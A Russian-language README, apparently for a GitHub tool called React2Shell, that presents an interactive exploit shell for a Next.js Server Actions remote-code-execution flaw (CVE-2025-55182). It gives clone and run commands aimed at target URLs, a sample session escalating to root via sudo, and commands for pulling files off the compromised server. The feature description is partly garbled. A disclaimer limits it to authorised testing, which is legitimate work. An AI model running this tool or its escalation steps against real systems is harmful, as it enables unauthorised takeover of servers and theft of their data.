
Расширенный набор инструментов для эксплуатации Next.js Server Actions (CVE-2025-55182)
Продвинутый эксплуатационный набор для Server Actions Next.js (CVE-2025-55182).
React2Shell — это мощная интерактивная оболочка, предназначенная для эксплуатации уязвимости React2Shell. Она выходит за рамки простого RCE, предоставляя историю команд, возможность передачи файлов и автоматические стратегии повышения привилегий.
base64 | sudo -i) для обхода ограничений оболочки и мгновенного повышения до root..download <remote> [local]: Надёжная бинарно-безопасная загрузка файлов с использованием кодировки base64..save: Сохранение вывода команды в локальные файлы доказательств.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Запуск с проверенной стратегией сохранения root-доступа:
python3 react2shell.py -u https://target.com/
Внутри оболочки:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Режим root ВКЛЮЧЁН
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ. Этот инструмент предназначен для исследований в области безопасности и тестирования с разрешения. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Не сканируйте и не эксплуатируйте цели, на тестирование которых у вас нет явного разрешения.
Разработано для этичного тестирования на проникновение и операций red team.
| Команда | Описание |
|---|
.root | Включить режим root (обёртка команд в sudo -i) |
.download <file> | Скачать файл с удалённого сервера |
.save | Сохранить вывод последней команды в файл |
.exit | Выйти из оболочки |